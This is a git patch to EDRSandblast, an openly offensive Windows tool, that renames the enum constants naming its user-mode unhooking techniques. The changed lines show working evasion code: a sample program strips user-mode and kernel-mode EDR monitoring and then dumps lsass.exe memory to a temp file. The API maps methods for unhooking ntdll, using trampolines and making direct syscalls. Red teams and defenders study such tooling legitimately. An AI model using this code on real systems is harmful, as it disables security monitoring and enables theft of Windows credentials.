From 1dab1efdd6868f22f52e0935210e885dc2107d3b Mon Sep 17 00:00:00 2001
From: Maxime Meignan <maxime.meignan@wavestone.com>
Date: Sat, 13 Aug 2022 09:00:40 -0700
Subject: [PATCH] Changed enum names in API

---
 .../EDRSandblast_LsassDump.c                  |  4 ++--
 EDRSandblast_StaticLibrary/EDRSandblast_API.c | 20 +++++++++----------
 EDRSandblast_StaticLibrary/EDRSandblast_API.h | 10 +++++-----
 3 files changed, 17 insertions(+), 17 deletions(-)

diff --git a/EDRSandblast_LsassDump/EDRSandblast_LsassDump.c b/EDRSandblast_LsassDump/EDRSandblast_LsassDump.c
index 92cca91..c39f020 100644
--- a/EDRSandblast_LsassDump/EDRSandblast_LsassDump.c
+++ b/EDRSandblast_LsassDump/EDRSandblast_LsassDump.c
@@ -23,9 +23,9 @@ int main()
     if (status = EDRSB_Init(&ctx, &cfg) != EDRSB_SUCCESS) {
         printf("EDRSB_Init: %u", status);
     }
-    Usermode_RemoveAllMonitoring(&ctx, Find_and_use_existing_trampoline);
+    Usermode_RemoveAllMonitoring(&ctx, EDRSB_UMTECH_Find_and_use_existing_trampoline);
     Krnlmode_RemoveAllMonitoring(&ctx);
-    Action_DumpProcessByName(&ctx, L"lsass.exe", L"C:\\no_scan\\tmp\\tmp.tmp", Find_and_use_existing_trampoline);
+    Action_DumpProcessByName(&ctx, L"lsass.exe", L"C:\\temp\\tmp.tmp", EDRSB_UMTECH_Find_and_use_existing_trampoline);
     Krnlmode_RestoreAllMonitoring(&ctx);
     EDRSB_CleanUp(&ctx);
 }
diff --git a/EDRSandblast_StaticLibrary/EDRSandblast_API.c b/EDRSandblast_StaticLibrary/EDRSandblast_API.c
index f1ff974..0187ca0 100644
--- a/EDRSandblast_StaticLibrary/EDRSandblast_API.c
+++ b/EDRSandblast_StaticLibrary/EDRSandblast_API.c
@@ -519,11 +519,11 @@ VOID Usermode_EnumAllMonitoring(_Inout_ EDRSB_CONTEXT* ctx) {
 
 VOID Usermode_RemoveAllMonitoring(_Inout_ EDRSB_CONTEXT* ctx, EDRSB_USERMODE_TECHNIQUE technique) {
     UNHOOK_METHOD map_methods[5] = { 0 }; //maps EDRSB_USERMODE_TECHNIQUE enum with UNHOOK_METHOD enum
-    map_methods[Unhook_with_ntdll_NtProtectVirtualMemory] = UNHOOK_WITH_NTPROTECTVIRTUALMEMORY;
-    map_methods[Copy_ntdll_and_load] = UNHOOK_WITH_DUPLICATE_NTPROTECTVIRTUALMEMORY;
-    map_methods[Allocate_trampoline] = UNHOOK_WITH_INHOUSE_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
-    map_methods[Find_and_use_existing_trampoline] = UNHOOK_WITH_EDR_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
-    map_methods[Use_direct_syscall] = UNHOOK_WITH_DIRECT_SYSCALL;
+    map_methods[EDRSB_UMTECH_Unhook_with_ntdll_NtProtectVirtualMemory] = UNHOOK_WITH_NTPROTECTVIRTUALMEMORY;
+    map_methods[EDRSB_UMTECH_Copy_ntdll_and_load] = UNHOOK_WITH_DUPLICATE_NTPROTECTVIRTUALMEMORY;
+    map_methods[EDRSB_UMTECH_Allocate_trampoline] = UNHOOK_WITH_INHOUSE_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
+    map_methods[EDRSB_UMTECH_Find_and_use_existing_trampoline] = UNHOOK_WITH_EDR_NTPROTECTVIRTUALMEMORY_TRAMPOLINE;
+    map_methods[EDRSB_UMTECH_Use_direct_syscall] = UNHOOK_WITH_DIRECT_SYSCALL;
     UNHOOK_METHOD unhook_method = map_methods[technique];
 
     if (!ctx->foundUserlandHooks) {
@@ -552,17 +552,17 @@ EDRSB_STATUS _GetSafeNtFunctionbyUnhookingWithNtProtectVirtualMemory(_In_ LPCSTR
 EDRSB_STATUS Usermode_GetSafeNtFunc(_Inout_ EDRSB_CONTEXT* ctx, _In_ LPCSTR functionName, _Outptr_result_maybenull_ PVOID* function, EDRSB_USERMODE_TECHNIQUE technique) {
     WCHAR tempDLLFilePath[MAX_PATH] = { 0 };
     switch (technique) {
-    case Copy_ntdll_and_load:
+    case EDRSB_UMTECH_Copy_ntdll_and_load:
         GetTempPathW(MAX_PATH, tempDLLFilePath);
         PathCchCombine(tempDLLFilePath, _countof(tempDLLFilePath), tempDLLFilePath, L"ntdlol.txt");//TODO : make it configurable
         return _Usermode_GetSafeNtFunction_with_ntdll_copy(ctx, tempDLLFilePath, functionName, function);
-    case Allocate_trampoline:
+    case EDRSB_UMTECH_Allocate_trampoline:
         return _GetSafeNtFunctionUsingTrampoline(FALSE, functionName, function);
-    case Find_and_use_existing_trampoline:
+    case EDRSB_UMTECH_Find_and_use_existing_trampoline:
         return _GetSafeNtFunctionUsingTrampoline(TRUE, functionName, function);
-    case Unhook_with_ntdll_NtProtectVirtualMemory:
+    case EDRSB_UMTECH_Unhook_with_ntdll_NtProtectVirtualMemory:
         return _GetSafeNtFunctionbyUnhookingWithNtProtectVirtualMemory(functionName, function);
-    case Use_direct_syscall:
+    case EDRSB_UMTECH_Use_direct_syscall:
         *function = CreateSyscallStubWithVirtuallAlloc(functionName);
         if (*function) {
             return EDRSB_SUCCESS;
diff --git a/EDRSandblast_StaticLibrary/EDRSandblast_API.h b/EDRSandblast_StaticLibrary/EDRSandblast_API.h
index c32e073..9699ee9 100644
--- a/EDRSandblast_StaticLibrary/EDRSandblast_API.h
+++ b/EDRSandblast_StaticLibrary/EDRSandblast_API.h
@@ -32,11 +32,11 @@ typedef struct EDRSB_BYPASS_MODE_t {
 } EDRSB_BYPASS_MODE;
 
 typedef enum EDRSB_USERMODE_TECHNIQUE_e {
-    Unhook_with_ntdll_NtProtectVirtualMemory,
-    Copy_ntdll_and_load,
-    Allocate_trampoline,
-    Find_and_use_existing_trampoline,
-    Use_direct_syscall,
+    EDRSB_UMTECH_Unhook_with_ntdll_NtProtectVirtualMemory,
+    EDRSB_UMTECH_Copy_ntdll_and_load,
+    EDRSB_UMTECH_Allocate_trampoline,
+    EDRSB_UMTECH_Find_and_use_existing_trampoline,
+    EDRSB_UMTECH_Use_direct_syscall,
 } EDRSB_USERMODE_TECHNIQUE;
 
 // TODO: update values.